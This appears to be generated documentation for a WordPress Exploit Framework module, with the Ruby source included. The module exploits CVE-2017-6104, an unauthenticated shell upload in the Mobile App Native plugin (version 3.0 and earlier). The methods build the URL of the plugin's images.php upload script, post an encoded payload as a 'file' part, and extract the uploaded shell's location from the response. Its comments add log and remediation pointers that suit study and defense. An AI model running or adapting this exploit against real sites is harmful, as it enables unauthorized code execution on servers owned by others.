class Wpxf::Exploit::MobileAppNativeV3ShellUpload
Public Class Methods
new()
Calls superclass method
Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/mobile_app_native_v3_shell_upload.rb, line 6
#
# Sets up the module and registers its descriptive metadata.
#
# The metadata ties this module to CVE-2017-6104 / WPVDB 8743, an
# unauthenticated file upload affecting the Mobile App Native plugin up to
# and including 3.0 (per the module name). The reference list is the starting
# point for confirming exposure and tracking remediation of that issue.
def initialize
  # Let the parent class initialise itself before metadata is layered on.
  super

  credits = [
    'Larry W. Cashdollar', # Discovery and disclosure
    'rastating'            # WPXF module
  ]

  advisories = [
    ['WPVDB', '8743'],
    ['CVE', '2017-6104'],
    ['URL', 'http://www.vapidlabs.com/advisory.php?v=178']
  ]

  update_info(
    name: 'Mobile App Native <= 3.0 Unauthenticated Shell Upload',
    author: credits,
    references: advisories,
    date: 'Feb 27 2017'
  )
end
Public Instance Methods
check()
# File lib/wpxf/modules/exploit/shell/mobile_app_native_v3_shell_upload.rb, line 24
#
# Reports the vulnerability status of the target.
#
# This method never inspects the target: it unconditionally answers
# :unknown. A result from it therefore says nothing about whether a site is
# patched; exposure has to be established from the installed plugin version.
#
# @return [Symbol] always :unknown
def check
  :unknown
end
payload_body_builder()
# File lib/wpxf/modules/exploit/shell/mobile_app_native_v3_shell_upload.rb, line 36
#
# Builds the request body used for the upload.
#
# The body carries a single file part under the form field name 'file',
# filled from the encoded payload. payload_name is passed as the third
# argument (presumably the file name of that part; confirm against
# Utility::BodyBuilder). For log and WAF review, the relevant trait is a
# file part named 'file' sent to the plugin's upload script.
#
# @return [Utility::BodyBuilder] the populated body builder
def payload_body_builder
  Utility::BodyBuilder.new.tap do |form|
    form.add_file_from_string('file', payload.encoded, payload_name)
  end
end
plugin_name()
# File lib/wpxf/modules/exploit/shell/mobile_app_native_v3_shell_upload.rb, line 28
#
# Names the plugin directory this module addresses.
#
# The same slug is what an administrator would look for under the site's
# plugins directory when checking whether the affected plugin is installed.
#
# @return [String] the plugin slug
def plugin_name
  'zen-mobile-app-native'
end
uploaded_payload_location()
# File lib/wpxf/modules/exploit/shell/mobile_app_native_v3_shell_upload.rb, line 42
#
# Derives the location of the uploaded file from the upload response.
#
# The response body is taken as the location once it has been stripped and
# any "<plugin_name>//server" sequence has been collapsed to
# "<plugin_name>/server". Presumably the server echoes the stored path in
# the body; that is not shown here.
#
# @return [String, nil] the cleaned-up response body, or nil when the
#   response code is not 200 or the body matches "Ooops" (case-insensitive)
def uploaded_payload_location
  # Anything other than a 200 is treated as a failed upload.
  return nil unless upload_result.code == 200

  # The body is only examined after the status check has passed.
  return nil if upload_result.body =~ /Ooops.*/i

  doubled_separator = /#{plugin_name}\/\/server/
  single_separator = "#{plugin_name}/server"
  upload_result.body.gsub(doubled_separator, single_separator).strip
end
uploader_url()
# File lib/wpxf/modules/exploit/shell/mobile_app_native_v3_shell_upload.rb, line 32
#
# Builds the URL of the plugin's upload script.
#
# The URL is the plugins base URL followed by the plugin slug and
# 'server/images.php'. Requests to that script are the access-log indicator
# for this issue, and removing or updating the plugin closes the endpoint.
#
# @return the value produced by normalize_uri for those path segments
def uploader_url
  endpoint_segments = [wordpress_url_plugins, plugin_name, 'server', 'images.php']
  normalize_uri(*endpoint_segments)
end